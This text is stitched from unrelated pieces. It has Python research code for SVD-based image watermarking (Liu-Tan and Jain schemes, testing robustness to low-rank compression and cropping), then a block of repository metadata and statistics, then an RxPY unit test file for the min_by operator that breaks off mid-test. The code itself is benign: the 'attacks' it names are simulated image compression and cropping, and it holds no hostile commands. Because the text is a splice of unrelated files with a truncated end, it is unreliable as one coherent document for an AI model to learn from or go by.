        it.save_image(recovered, '../out/watermarking/extracted_watermark/liutan/extracted_watermark_alpha_{}.png'.format(scale))
def watermark_embed_jain(img, watermark, scale, save):
    """Embed `watermark` into `img` with the Jain scheme.

    Returns the watermarked image when save == 'no'; writes it to
    out/watermarking/watermarked_image/jain when save == 'yes'.
    """
    marked, _vh = it.embed_watermark_jain(img, watermark, scale=scale)
    marked = marked.astype(np.int32)
    if save == 'no':
        return marked
    if save == 'yes':
        it.save_image(marked, '../out/watermarking/watermarked_image/jain/watermarked_image_alpha_{}.png'.format(scale))
def watermark_extract_jain(img, watermark, scale, save):
    """Embed then extract a watermark with the Jain scheme (round trip).

    Returns the recovered watermark when save == 'no'; writes it to
    out/watermarking/extracted_watermark/jain when save == 'yes'.
    """
    marked, key_vh = it.embed_watermark_jain(img, watermark, scale=scale)
    recovered = it.extract_watermark_jain(marked, img, key_vh, scale)
    recovered = reversepad(recovered, watermark).astype(np.int32)
    if save == 'no':
        return recovered
    if save == 'yes':
        it.save_image(recovered, '../out/watermarking/extracted_watermark/jain/extracted_watermark_alpha_{}.png'.format(scale))
def watermark_embed_jain_mod(img, watermark, scale, save):
    """Embed `watermark` into `img` with the modified Jain scheme.

    Returns the watermarked image when save == 'no'; writes it to
    out/watermarking/watermarked_image/jainmod when save == 'yes'.
    """
    marked, _vh = it.embed_watermark_jain_mod(img, watermark, scale=scale)
    marked = marked.astype(np.int32)
    if save == 'no':
        return marked
    if save == 'yes':
        it.save_image(marked, '../out/watermarking/watermarked_image/jainmod/watermarked_image_alpha_{}.png'.format(scale))
def watermark_extract_jain_mod(img, watermark, scale, save):
    """Embed then extract a watermark with the modified Jain scheme (round trip).

    Returns the recovered watermark when save == 'no'; writes it to
    out/watermarking/extracted_watermark/jainmod when save == 'yes'.
    """
    marked, key_vh = it.embed_watermark_jain_mod(img, watermark, scale=scale)
    recovered = it.extract_watermark_jain_mod(marked, img, key_vh, scale)
    recovered = reversepad(recovered, watermark).astype(np.int32)
    if save == 'no':
        return recovered
    if save == 'yes':
        it.save_image(recovered, '../out/watermarking/extracted_watermark/jainmod/extracted_watermark_alpha_{}.png'.format(scale))
def perceptibility_liutan(img, watermark, scale):
    """Relative norm difference between `img` and its Liu-Tan watermarked copy.

    Both images are cast to int32 and channel-stacked to 2-D before taking
    ||marked - original|| / ||original||.
    """
    marked = it.embed_watermark(img, watermark, scale=scale)[0]
    flat_marked = marked.astype(np.int32).reshape(marked.shape[0], -1)
    flat_orig = img.astype(np.int32).reshape(img.shape[0], -1)
    return np.linalg.norm(flat_marked - flat_orig) / np.linalg.norm(flat_orig)
def perceptibility_jain(img, watermark, scale):
    """Relative norm difference between `img` and its Jain watermarked copy.

    Both images are cast to int32 and channel-stacked to 2-D before taking
    ||marked - original|| / ||original||.
    """
    marked = it.embed_watermark_jain(img, watermark, scale=scale)[0]
    flat_marked = marked.astype(np.int32).reshape(marked.shape[0], -1)
    flat_orig = img.astype(np.int32).reshape(img.shape[0], -1)
    return np.linalg.norm(flat_marked - flat_orig) / np.linalg.norm(flat_orig)
def perceptibility_jain_mod(img, watermark, scale):
    """Relative norm difference between `img` and its modified-Jain watermarked copy.

    Both images are cast to int32 and channel-stacked to 2-D before taking
    ||marked - original|| / ||original||.
    """
    marked = it.embed_watermark_jain_mod(img, watermark, scale=scale)[0]
    flat_marked = marked.astype(np.int32).reshape(marked.shape[0], -1)
    flat_orig = img.astype(np.int32).reshape(img.shape[0], -1)
    return np.linalg.norm(flat_marked - flat_orig) / np.linalg.norm(flat_orig)
def watermarkedplot(img, watermark, plottype):
    """Sweep alpha in [0.05, 2.0] and plot perceptibility error for one scheme.

    plottype selects the scheme: 1 = Liu-Tan, 2 = Jain, 3 = modified Jain.
    Any other value produces an empty curve, matching the original behavior.
    """
    measures = {
        1: perceptibility_liutan,
        2: perceptibility_jain,
        3: perceptibility_jain_mod,
    }
    scales = np.arange(0.05, 2.05, 0.05)
    differences = []
    measure = measures.get(plottype)
    if measure is not None:
        for scale in scales:
            print(scale)  # progress indicator: each embedding is slow
            differences.append(measure(img, watermark, scale))
    drawgraph_difference(scales, differences, plottype)
def drawgraph_difference(x, y, plottype):
    """Plot error-vs-alpha and save the figure for the selected scheme, then show it.

    plottype selects the output directory: 1 = liutan, 2 = jain, 3 = jainmod;
    other values only display the plot without saving.
    """
    plt.plot(x, y, marker='o')
    plt.xlabel('Alpha')
    plt.ylabel('Error')
    outpaths = {
        1: '../out/watermarking/plots/perceptibility/liutan/perceptibility_liutan.png',
        2: '../out/watermarking/plots/perceptibility/jain/perceptibility_jain.png',
        3: '../out/watermarking/plots/perceptibility/jainmod/perceptibility_jain_mod.png',
    }
    if plottype in outpaths:
        plt.savefig(outpaths[plottype])
    plt.show()
#lowrank extraction error
def lowrank_image_liutan(img, watermark, scale, rank, save):
    """Extract a Liu-Tan watermark after low-rank compressing the watermarked image.

    Embeds, compresses the watermarked image to `rank`, then extracts using
    the ORIGINAL keys against the compressed image. Returns the extracted
    watermark when save == 'no'; writes it to disk when save == 'yes'.
    """
    marked, key_u, key_s, key_vh = it.embed_watermark(img, watermark, scale=scale)
    marked = marked.astype(np.int32)
    # rank-limited approximation simulates lossy compression of the carrier
    compressed = it.lowrankapprox(marked, rank)
    recovered = it.extract_watermark(compressed, key_u, key_s, key_vh,
            scale=scale)
    recovered = reversepad(recovered, watermark).astype(np.int32)
    if save == 'no':
        return recovered
    if save == 'yes':
        it.save_image(recovered, '../out/watermarking/robustness/lowrankextraction/liutan/extraction_rank_{}_alpha_{}.png'.format(rank, scale))
def lowrank_watermarked_image_liutan(img, watermark, scale, rank, save):
    """Return/save the rank-compressed Liu-Tan watermarked image itself.

    Returns the compressed image when save == 'no'; writes it to disk when
    save == 'yes'.
    """
    marked = it.embed_watermark(img, watermark, scale=scale)[0]
    marked = marked.astype(np.int32)
    compressed = it.lowrankapprox(marked, rank).astype(np.int32)
    if save == 'no':
        return compressed
    if save == 'yes':
        it.save_image(compressed, '../out/watermarking/robustness/lowrankembedding/liutan/embedding_rank_{}_alpha_{}.png'.format(rank, scale))
def lowrank_image_jain(img, watermark, scale, rank, save):
    """Embed a watermark (Jain scheme), compress the watermarked image to
    the given rank, then extract the watermark from the compressed image.

    save='no' returns the extracted watermark; save='yes' writes it to disk
    (returns None, as for any other value of save).
    """
    marked, key_vh = it.embed_watermark_jain(img, watermark, scale=scale)
    marked = marked.astype(np.int32)
    # Simulated compression attack on the watermarked image.
    attacked = it.lowrankapprox(marked, rank)
    # Recover the watermark using the original host image and key.
    extracted = it.extract_watermark_jain(attacked, img, key_vh, scale)
    extracted = reversepad(extracted, watermark)
    extracted = extracted.astype(np.int32)
    if save == 'no':
        return extracted
    if save == 'yes':
        it.save_image(extracted, '../out/watermarking/robustness/lowrankextraction/jain/extraction_rank_{}_alpha_{}.png'.format(rank, scale))
def lowrank_watermarked_image_jain(img, watermark, scale, rank, save):
    """Embed a watermark (Jain scheme) and compute the rank-`rank`
    approximation of the watermarked image.

    save='no' returns the compressed image; save='yes' writes it to disk
    (returns None, as for any other value of save).
    """
    marked = it.embed_watermark_jain(img, watermark, scale=scale)[0]
    marked = marked.astype(np.int32)
    # Simulated compression attack on the watermarked image.
    compressed = it.lowrankapprox(marked, rank).astype(np.int32)
    if save == 'no':
        return compressed
    if save == 'yes':
        it.save_image(compressed, '../out/watermarking/robustness/lowrankembedding/jain/embedding_rank_{}_alpha_{}.png'.format(rank, scale))
def lowrank_image_jain_mod(img, watermark, scale, rank, save):
    """Embed a watermark (modified Jain scheme), compress the watermarked
    image to the given rank, then extract the watermark from the compressed
    image.

    save='no' returns the extracted watermark; save='yes' writes it to disk
    (returns None, as for any other value of save).
    """
    img_watermarked, watermark_vh = it.embed_watermark_jain_mod(img, watermark, scale=scale)
    img_watermarked = img_watermarked.astype(np.int32)
    # Low-rank compression attack on the watermarked image.
    img_watermarked_approx = it.lowrankapprox(img_watermarked, rank)
    # BUG FIX: extract from the compressed image. The original passed the
    # uncompressed `img_watermarked` here, so the approximation above was
    # never used and the robustness result ignored the attack (compare the
    # liutan/jain variants and lowrank_error_jain_mod, which all use the
    # approximated image).
    watermark_extracted = it.extract_watermark_jain_mod(img_watermarked_approx, img, watermark_vh, scale=scale)
    watermark_extracted = reversepad(watermark_extracted, watermark)
    watermark_extracted = watermark_extracted.astype(np.int32)
    if save == 'no':
        return watermark_extracted
    elif save == 'yes':
        it.save_image(watermark_extracted, '../out/watermarking/robustness/lowrankextraction/jainmod/extraction_rank_{}_alpha_{}.png'.format(rank, scale))
def lowrank_watermarked_image_jain_mod(img, watermark, scale, rank, save):
    """Embed a watermark (modified Jain scheme) and compute the rank-`rank`
    approximation of the watermarked image.

    save='no' returns the compressed image; save='yes' writes it to disk
    (returns None, as for any other value of save).
    """
    marked = it.embed_watermark_jain_mod(img, watermark, scale=scale)[0]
    marked = marked.astype(np.int32)
    # Simulated compression attack on the watermarked image.
    compressed = it.lowrankapprox(marked, rank).astype(np.int32)
    if save == 'no':
        return compressed
    if save == 'yes':
        it.save_image(compressed, '../out/watermarking/robustness/lowrankembedding/jainmod/embedding_rank_{}_alpha_{}.png'.format(rank, scale))
def lowrank_error_liutan(img, watermark, scale, rank):
    """Relative Frobenius-norm error of the watermark extracted after the
    Liu-Tan watermarked image is compressed to the given rank.

    Returns ||extracted - original|| / ||original|| over the row-stacked
    (2-D) watermarks.
    """
    marked, key_u, key_s, key_vh = it.embed_watermark(img, watermark, scale=scale)
    # Compression attack, then extraction with the original keys.
    attacked = it.lowrankapprox(marked, rank)
    extracted = it.extract_watermark(attacked, key_u, key_s, key_vh, scale=scale)
    extracted = reversepad(extracted, watermark)
    # Flatten both watermarks to 2-D so the matrix norm applies.
    extracted = extracted.astype(np.float64)
    extracted_2d = extracted.reshape(extracted.shape[0], -1)
    original = watermark.astype(np.float64)
    original_2d = original.reshape(original.shape[0], -1)
    return np.linalg.norm(extracted_2d - original_2d) / np.linalg.norm(original_2d)
def lowrank_error_jain(img, watermark, scale, rank):
    """Relative Frobenius-norm error of the watermark extracted after the
    Jain watermarked image is compressed to the given rank.

    Returns ||extracted - original|| / ||original|| over the row-stacked
    (2-D) watermarks.
    """
    marked, key_vh = it.embed_watermark_jain(img, watermark, scale=scale)
    # Compression attack, then extraction with the original host and key.
    attacked = it.lowrankapprox(marked, rank)
    extracted = it.extract_watermark_jain(attacked, img, key_vh, scale)
    extracted = reversepad(extracted, watermark)
    # Flatten both watermarks to 2-D so the matrix norm applies.
    extracted = extracted.astype(np.float64)
    extracted_2d = extracted.reshape(extracted.shape[0], -1)
    original = watermark.astype(np.float64)
    original_2d = original.reshape(original.shape[0], -1)
    return np.linalg.norm(extracted_2d - original_2d) / np.linalg.norm(original_2d)
def lowrank_error_jain_mod(img, watermark, scale, rank):
    """Relative Frobenius-norm error of the watermark extracted after the
    modified-Jain watermarked image is compressed to the given rank.

    Returns ||extracted - original|| / ||original|| over the row-stacked
    (2-D) watermarks.
    """
    marked, key_vh = it.embed_watermark_jain_mod(img, watermark, scale=scale)
    # Compression attack, then extraction with the original host and key.
    attacked = it.lowrankapprox(marked, rank)
    extracted = it.extract_watermark_jain_mod(attacked, img, key_vh, scale=scale)
    extracted = reversepad(extracted, watermark)
    # Flatten both watermarks to 2-D so the matrix norm applies.
    extracted = extracted.astype(np.float64)
    extracted_2d = extracted.reshape(extracted.shape[0], -1)
    original = watermark.astype(np.float64)
    original_2d = original.reshape(original.shape[0], -1)
    return np.linalg.norm(extracted_2d - original_2d) / np.linalg.norm(original_2d)
def lowrank_extractionerror_plot_liutan(img, watermark):
    """Plot extraction error vs. compression rank for the Liu-Tan scheme at
    several embedding strengths (alpha) and save the figure as EPS.
    """
    alphas = (0.05, 0.1, 0.5, 0.75)
    ranks = np.arange(1, 300)
    for alpha in alphas:
        errors = []
        for rank in ranks:
            errors.append(lowrank_error_liutan(img, watermark, alpha, rank))
            # Progress indicator: these sweeps are slow.
            print("liutan", rank)
        plt.plot(errors, label="a = {0}".format(alpha))
    plt.xlabel('Rank')
    plt.ylabel('Error')
    plt.legend()
    plt.savefig('../out/watermarking/plots/lowrankcompression/liutan/lowrank_extractionerror_liutan.eps', bbox_inches='tight')
def lowrank_extractionerror_plot_jain(img, watermark):
    """Plot extraction error vs. compression rank for the Jain scheme at
    several embedding strengths (alpha) and save the figure as EPS.
    """
    alphas = (0.05, 0.1, 0.5, 0.75)
    ranks = np.arange(1, 300)
    for alpha in alphas:
        errors = []
        for rank in ranks:
            errors.append(lowrank_error_jain(img, watermark, alpha, rank))
            # Progress indicator: these sweeps are slow.
            print("jain", rank)
        plt.plot(errors, label="a = {0}".format(alpha))
    plt.xlabel('Rank')
    plt.ylabel('Error')
    plt.legend()
    plt.savefig('../out/watermarking/plots/lowrankcompression/jain/lowrank_extractionerror_jain.eps', bbox_inches='tight')
def lowrank_extractionerror_plot_jain_mod(img, watermark):
    """Plot extraction error vs. compression rank for the modified Jain
    scheme at several embedding strengths (alpha) and save as EPS.

    NOTE(review): `alphas` lists five values but, as in the original code,
    only the first four (0.05, 0.1, 0.25, 0.5) are plotted — 0.75 is never
    used. Confirm whether a fifth curve was intended.
    """
    alphas = (0.05, 0.1, 0.25, 0.5, 0.75)
    ranks = np.arange(1, 300)
    for alpha in alphas[:4]:
        errors = []
        for rank in ranks:
            errors.append(lowrank_error_jain_mod(img, watermark, alpha, rank))
            # Progress indicator: these sweeps are slow.
            print("jain mod", rank)
        plt.plot(errors, label="a = {0}".format(alpha))
    plt.xlabel('Rank')
    plt.ylabel('Error')
    plt.legend()
    plt.savefig('../out/watermarking/plots/lowrankcompression/jainmod/lowrank_extractionerror_jain_mod.eps', bbox_inches='tight')
#cropping tests
def crop_left(img, number):
    """Return `img` (a 3-D H x W x C array) with its first `number` pixel
    columns removed."""
    return img[:, number:, :]
def crop_right(img, number):
    """Return `img` (a 3-D H x W x C array) with its last `number` pixel
    columns removed.

    number == 0 is handled explicitly: the naive slice img[:, :-0, :]
    evaluates to img[:, :0, :] and would return an empty array instead of
    the unchanged image.
    """
    if number == 0:
        return img
    return img[:, :-number, :]
def crop_bottom(img, number):
    """Return `img` (a 3-D H x W x C array) with its last `number` pixel
    rows removed.

    number == 0 is handled explicitly: the naive slice img[:-0, :, :]
    evaluates to img[:0, :, :] and would return an empty array instead of
    the unchanged image.
    """
    if number == 0:
        return img
    return img[:-number, :, :]
def crop_top(img, number):
    """Return `img` (a 3-D H x W x C array) with its first `number` pixel
    rows removed."""
    return img[number:, :, :]
def crop_image_liutan(img, watermark, scale, number, side):
    """Embed a watermark (Liu-Tan scheme), crop `number` pixels from `side`
    ('left', 'right', 'bottom' or 'top'), pad the result back to the
    original size and save it to disk.
    """
    marked = it.embed_watermark(img, watermark, scale=scale)[0]
    marked = marked.astype(np.int32)
    if side == 'left':
        cropped = crop_left(marked, number)
    elif side == 'right':
        cropped = crop_right(marked, number)
    elif side == 'bottom':
        cropped = crop_bottom(marked, number)
    elif side == 'top':
        cropped = crop_top(marked, number)
    # Pad back so the saved image has the original dimensions.
    padded = it.padimage3d(img, cropped).astype(np.int32)
    it.save_image(padded, '../out/watermarking/cropping/embedding/liutan/embedding_alpha_{}_cropped_{}_from_{}.png'.format(scale, number, side))
def crop_extract_watermark_liutan(img, watermark, scale, number, side):
    """Embed a watermark (Liu-Tan scheme), crop `number` pixels from `side`
    ('left', 'right', 'bottom' or 'top'), pad back to the original size,
    then extract the watermark from the damaged image and save it.
    """
    marked, key_u, key_s, key_vh = it.embed_watermark(img, watermark, scale=scale)
    marked = marked.astype(np.int32)
    if side == 'left':
        cropped = crop_left(marked, number)
    elif side == 'right':
        cropped = crop_right(marked, number)
    elif side == 'bottom':
        cropped = crop_bottom(marked, number)
    elif side == 'top':
        cropped = crop_top(marked, number)
    # Pad back so the extraction key dimensions still match.
    padded = it.padimage3d(img, cropped).astype(np.int32)
    extracted = it.extract_watermark(padded, key_u, key_s, key_vh, scale=scale)
    extracted = reversepad(extracted, watermark).astype(np.int32)
    it.save_image(extracted, '../out/watermarking/cropping/extracting/liutan/extracted_watermark_alpha_{}_cropped_{}_from_{}.png'.format(scale, number, side))
def crop_image_jain(img, watermark, scale, number, side):
    """Embed a watermark (Jain scheme), crop `number` pixels from `side`
    ('left', 'right', 'bottom' or 'top'), pad the result back to the
    original size and save it to disk.
    """
    marked = it.embed_watermark_jain(img, watermark, scale=scale)[0]
    marked = marked.astype(np.int32)
    if side == 'left':
        cropped = crop_left(marked, number)
    elif side == 'right':
        cropped = crop_right(marked, number)
    elif side == 'bottom':
        cropped = crop_bottom(marked, number)
    elif side == 'top':
        cropped = crop_top(marked, number)
    # Pad back so the saved image has the original dimensions.
    padded = it.padimage3d(img, cropped).astype(np.int32)
    it.save_image(padded, '../out/watermarking/cropping/embedding/jain/embedding_alpha_{}_cropped_{}_from_{}.png'.format(scale, number, side))
def crop_extract_watermark_jain(img, watermark, scale, number, side):
    """Embed a watermark (Jain scheme), crop `number` pixels from `side`
    ('left', 'right', 'bottom' or 'top'), pad back to the original size,
    then extract the watermark from the damaged image and save it.
    """
    marked, key_vh = it.embed_watermark_jain(img, watermark, scale=scale)
    marked = marked.astype(np.int32)
    if side == 'left':
        cropped = crop_left(marked, number)
    elif side == 'right':
        cropped = crop_right(marked, number)
    elif side == 'bottom':
        cropped = crop_bottom(marked, number)
    elif side == 'top':
        cropped = crop_top(marked, number)
    # Pad back so the extraction key dimensions still match.
    padded = it.padimage3d(img, cropped).astype(np.int32)
    extracted = it.extract_watermark_jain(padded, img, key_vh, scale)
    extracted = reversepad(extracted, watermark).astype(np.int32)
    it.save_image(extracted, '../out/watermarking/cropping/extracting/jain/extracted_watermark_alpha_{}_cropped_{}_from_{}.png'.format(scale, number, side))
def crop_image_jain_mod(img, watermark, scale, number, side):
    """Embed a watermark (modified Jain scheme), crop `number` pixels from
    `side` ('left', 'right', 'bottom' or 'top'), pad the result back to the
    original size and save it to disk.
    """
    marked = it.embed_watermark_jain_mod(img, watermark, scale=scale)[0]
    marked = marked.astype(np.int32)
    if side == 'left':
        cropped = crop_left(marked, number)
    elif side == 'right':
        cropped = crop_right(marked, number)
    elif side == 'bottom':
        cropped = crop_bottom(marked, number)
    elif side == 'top':
        cropped = crop_top(marked, number)
    # Pad back so the saved image has the original dimensions.
    padded = it.padimage3d(img, cropped).astype(np.int32)
    it.save_image(padded, '../out/watermarking/cropping/embedding/jainmod/embedding_alpha_{}_cropped_{}_from_{}.png'.format(scale, number, side))
def crop_extract_watermark_jain_mod(img, watermark, scale, number, side):
    """Embed a watermark (modified Jain scheme), crop `number` pixels from
    `side` ('left', 'right', 'bottom' or 'top'), pad back to the original
    size, then extract the watermark from the damaged image and save it.
    """
    img_watermarked, watermark_vh = it.embed_watermark_jain_mod(img, watermark, scale=scale)
    img_watermarked = img_watermarked.astype(np.int32)
    # BUG FIX: the 'left' branch previously assigned to the misspelled name
    # 'croppedwatermarked_image', so side == 'left' left
    # 'cropped_watermarked_image' undefined and raised NameError below.
    if side == 'left':
        cropped_watermarked_image = crop_left(img_watermarked, number)
    elif side == 'right':
        cropped_watermarked_image = crop_right(img_watermarked, number)
    elif side == 'bottom':
        cropped_watermarked_image = crop_bottom(img_watermarked, number)
    elif side == 'top':
        cropped_watermarked_image = crop_top(img_watermarked, number)
    # Pad back so the extraction key dimensions still match.
    cropped_watermarked_image = it.padimage3d(img, cropped_watermarked_image)
    cropped_watermarked_image_padded = cropped_watermarked_image.astype(np.int32)
    watermark_extracted = it.extract_watermark_jain_mod(cropped_watermarked_image_padded, img, watermark_vh, scale)
    watermark_extracted_final = reversepad(watermark_extracted, watermark)
    watermark_extracted_final = watermark_extracted_final.astype(np.int32)
    it.save_image(watermark_extracted_final, '../out/watermarking/cropping/extracting/jainmod/extracted_watermark_alpha_{}_cropped_{}_from_{}.png'.format(scale, number, side))
| 47.536776
| 174
| 0.739992
| 3,755
| 30,376
| 5.713715
| 0.050067
| 0.098532
| 0.095409
| 0.020135
| 0.928082
| 0.921417
| 0.911536
| 0.901095
| 0.896667
| 0.856351
| 0
| 0.013395
| 0.159468
| 30,376
| 638
| 175
| 47.611285
| 0.826923
| 0.102811
| 0
| 0.755889
| 0
| 0
| 0.089049
| 0.073668
| 0
| 0
| 0
| 0
| 0
| 1
| 0.077088
| false
| 0
| 0.021413
| 0
| 0.149893
| 0.03212
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
71cc963c376905849b4bed61c98ac2638f98c3c3
| 10,728
|
py
|
Python
|
tests/test_observable/test_minby.py
|
mmpio/RxPY
|
4ed60bb5c04aa85de5210e5537a6adfe1b667d50
|
[
"MIT"
] | 4,342
|
2015-01-06T09:00:23.000Z
|
2022-03-28T15:05:50.000Z
|
tests/test_observable/test_minby.py
|
mmpio/RxPY
|
4ed60bb5c04aa85de5210e5537a6adfe1b667d50
|
[
"MIT"
] | 613
|
2015-01-07T20:44:56.000Z
|
2022-03-20T06:14:20.000Z
|
tests/test_observable/test_minby.py
|
mmpio/RxPY
|
4ed60bb5c04aa85de5210e5537a6adfe1b667d50
|
[
"MIT"
] | 420
|
2015-01-07T14:30:30.000Z
|
2022-03-11T22:47:46.000Z
|
import unittest
from rx import operators as ops
from rx.testing import TestScheduler, ReactiveTest
# Module-level shorthands for the ReactiveTest factory/marker attributes
# used throughout the test cases below.
on_next = ReactiveTest.on_next
on_completed = ReactiveTest.on_completed
on_error = ReactiveTest.on_error
subscribe = ReactiveTest.subscribe
subscribed = ReactiveTest.subscribed
disposed = ReactiveTest.disposed
created = ReactiveTest.created
class RxException(Exception):
    """Exception type raised deliberately from within test lambdas."""
def _raise(ex):
    """Helper for raising exceptions within lambdas: immediately raise an
    RxException wrapping *ex*."""
    raise RxException(ex)
class TestMinBy(unittest.TestCase):
    """Tests for the ``min_by`` operator.

    Each test drives a hot observable on a virtual-time TestScheduler and
    inspects the recorded messages: ``res[i].value.kind`` is 'N' (next),
    'C' (completed) or 'E' (error), and ``res[i].time`` is the virtual time
    at which the notification was recorded.
    """

    def test_min_by_empty(self):
        """With no post-subscription elements, min_by emits an empty list."""
        scheduler = TestScheduler()
        xs = scheduler.create_hot_observable(
            on_next(150, {"key": 1, "value": 'z'}), on_completed(250))

        def create():
            return xs.pipe(ops.min_by(lambda x: x["key"]))

        res = scheduler.start(create=create).messages
        assert(2 == len(res))
        assert(0 == len(res[0].value.value))
        assert(res[1].value.kind == 'C' and res[1].time == 250)

    def test_min_by_return(self):
        """A single element is itself the minimum."""
        scheduler = TestScheduler()
        xs = scheduler.create_hot_observable(
            on_next(150, {"key": 1, "value": 'z'}),
            on_next(210, {"key": 2, "value": 'a'}),
            on_completed(250))

        def create():
            return xs.pipe(ops.min_by(lambda x: x["key"]))

        res = scheduler.start(create=create).messages
        self.assertEqual(2, len(res))
        assert(res[0].value.kind == 'N')
        self.assertEqual(1, len(res[0].value.value))
        self.assertEqual(2, res[0].value.value[0]["key"])
        self.assertEqual('a', res[0].value.value[0]["value"])
        assert(res[1].value.kind == 'C' and res[1].time == 250)

    def test_min_by_some(self):
        """The element with the smallest key is selected."""
        scheduler = TestScheduler()
        msgs = [
            on_next(150, {
                "key": 1,
                "value": 'z'
            }), on_next(210, {
                "key": 3,
                "value": 'b'
            }), on_next(220, {
                "key": 2,
                "value": 'c'
            }), on_next(230, {
                "key": 4,
                "value": 'a'
            }), on_completed(250)
        ]
        xs = scheduler.create_hot_observable(msgs)

        def create():
            return xs.pipe(ops.min_by(lambda x: x["key"]))

        res = scheduler.start(create=create).messages
        self.assertEqual(2, len(res))
        assert(res[0].value.kind == 'N')
        self.assertEqual(1, len(res[0].value.value))
        self.assertEqual(2, res[0].value.value[0]["key"])
        self.assertEqual('c', res[0].value.value[0]["value"])
        assert(res[1].value.kind == 'C' and res[1].time == 250)

    def test_min_by_multiple(self):
        """All elements tied for the smallest key are emitted, in order."""
        scheduler = TestScheduler()
        msgs = [
            on_next(150, {
                "key": 1,
                "value": 'z'
            }), on_next(210, {
                "key": 3,
                "value": 'b'
            }), on_next(215, {
                "key": 2,
                "value": 'd'
            }), on_next(220, {
                "key": 3,
                "value": 'c'
            }), on_next(225, {
                "key": 2,
                "value": 'y'
            }), on_next(230, {
                "key": 4,
                "value": 'a'
            }), on_next(235, {
                "key": 4,
                "value": 'r'
            }), on_completed(250)
        ]
        xs = scheduler.create_hot_observable(msgs)

        def create():
            return xs.pipe(ops.min_by(lambda x: x["key"]))

        res = scheduler.start(create=create).messages
        self.assertEqual(2, len(res))
        assert(res[0].value.kind == 'N')
        self.assertEqual(2, len(res[0].value.value))
        self.assertEqual(2, res[0].value.value[0]["key"])
        self.assertEqual('d', res[0].value.value[0]["value"])
        self.assertEqual(2, res[0].value.value[1]["key"])
        self.assertEqual('y', res[0].value.value[1]["value"])
        assert(res[1].value.kind == 'C' and res[1].time == 250)

    def test_min_by_on_error(self):
        """A source error is forwarded unchanged."""
        ex = 'ex'
        scheduler = TestScheduler()
        msgs = [
            on_next(150, {
                "key": 1,
                "value": 'z'
            }), on_error(210, ex)
        ]
        xs = scheduler.create_hot_observable(msgs)

        def create():
            return xs.pipe(ops.min_by(lambda x: x["key"]))

        res = scheduler.start(create=create).messages
        assert res == [on_error(210, ex)]

    def test_min_by_never(self):
        """A never-completing source produces no notifications."""
        scheduler = TestScheduler()
        msgs = [
            on_next(150, {
                "key": 1,
                "value": 'z'
            })
        ]
        xs = scheduler.create_hot_observable(msgs)

        def create():
            return xs.pipe(ops.min_by(lambda x: x["key"]))

        res = scheduler.start(create=create).messages
        assert res == []

    def test_min_by_comparer_empty(self):
        """Custom comparer, empty source: an empty result list is emitted."""
        scheduler = TestScheduler()
        msgs = [
            on_next(150, {
                "key": 1,
                "value": 'z'
            }), on_completed(250)
        ]

        def reverse_comparer(a, b):
            if a > b:
                return -1
            if a == b:
                return 0
            return 1

        xs = scheduler.create_hot_observable(msgs)

        def create():
            return xs.pipe(ops.min_by(lambda x: x["key"], reverse_comparer))

        res = scheduler.start(create=create).messages
        self.assertEqual(2, len(res))
        self.assertEqual(0, len(res[0].value.value))
        assert(res[1].value.kind == 'C' and res[1].time == 250)

    def test_min_by_comparer_return(self):
        """Custom comparer, single element: that element is emitted."""
        scheduler = TestScheduler()
        msgs = [
            on_next(150, {
                "key": 1,
                "value": 'z'
            }), on_next(210, {
                "key": 2,
                "value": 'a'
            }), on_completed(250)
        ]

        def reverse_comparer(a, b):
            if a > b:
                return -1
            if a == b:
                return 0
            return 1

        xs = scheduler.create_hot_observable(msgs)

        def create():
            return xs.pipe(ops.min_by(lambda x: x["key"], reverse_comparer))

        res = scheduler.start(create=create).messages
        self.assertEqual(2, len(res))
        assert(res[0].value.kind == 'N')
        self.assertEqual(1, len(res[0].value.value))
        self.assertEqual(2, res[0].value.value[0]["key"])
        self.assertEqual('a', res[0].value.value[0]["value"])
        assert(res[1].value.kind == 'C' and res[1].time == 250)

    def test_min_by_comparer_some(self):
        """The reversed comparer makes min_by select the largest key."""
        scheduler = TestScheduler()
        msgs = [
            on_next(150, {
                "key": 1,
                "value": 'z'
            }), on_next(210, {
                "key": 3,
                "value": 'b'
            }), on_next(220, {
                "key": 20,
                "value": 'c'
            }), on_next(230, {
                "key": 4,
                "value": 'a'
            }), on_completed(250)
        ]

        def reverse_comparer(a, b):
            if a > b:
                return -1
            if a == b:
                return 0
            return 1

        xs = scheduler.create_hot_observable(msgs)

        def create():
            return xs.pipe(ops.min_by(lambda x: x["key"], reverse_comparer))

        res = scheduler.start(create=create).messages
        self.assertEqual(2, len(res))
        assert(res[0].value.kind == 'N')
        self.assertEqual(1, len(res[0].value.value))
        self.assertEqual(20, res[0].value.value[0]["key"])
        self.assertEqual('c', res[0].value.value[0]["value"])
        assert(res[1].value.kind == 'C' and res[1].time == 250)

    def test_min_by_comparer_on_error(self):
        """Custom comparer: a source error is forwarded unchanged."""
        ex = 'ex'
        scheduler = TestScheduler()
        msgs = [
            on_next(150, {
                "key": 1,
                "value": 'z'
            }), on_error(210, ex)
        ]

        def reverse_comparer(a, b):
            if a > b:
                return -1
            if a == b:
                return 0
            return 1

        # Consistency fix: every sibling test creates `xs` before `create`;
        # the original relied on late binding by defining `create` first.
        xs = scheduler.create_hot_observable(msgs)

        def create():
            return xs.pipe(ops.min_by(lambda x: x["key"], reverse_comparer))

        res = scheduler.start(create=create).messages
        assert res == [on_error(210, ex)]

    def test_min_by_comparer_never(self):
        """Custom comparer, never-completing source: no notifications."""
        scheduler = TestScheduler()
        msgs = [
            on_next(150, {
                "key": 1,
                "value": 'z'
            })
        ]

        def reverse_comparer(a, b):
            if a > b:
                return -1
            if a == b:
                return 0
            return 1

        xs = scheduler.create_hot_observable(msgs)

        def create():
            return xs.pipe(ops.min_by(lambda x: x["key"], reverse_comparer))

        res = scheduler.start(create=create).messages
        assert res == []

    def test_min_by_mapper_throws(self):
        """A throwing key mapper surfaces as an error notification."""
        ex = 'ex'
        scheduler = TestScheduler()
        msgs = [
            on_next(150, {
                "key": 1,
                "value": 'z'
            }), on_next(210, {
                "key": 3,
                "value": 'b'
            }), on_next(220, {
                "key": 2,
                "value": 'c'
            }), on_next(230, {
                "key": 4,
                "value": 'a'
            }), on_completed(250)
        ]

        def reverse_comparer(a, b):
            if a > b:
                return -1
            if a == b:
                return 0
            return 1

        xs = scheduler.create_hot_observable(msgs)

        def create():
            return xs.pipe(ops.min_by(lambda x: _raise(ex), reverse_comparer))

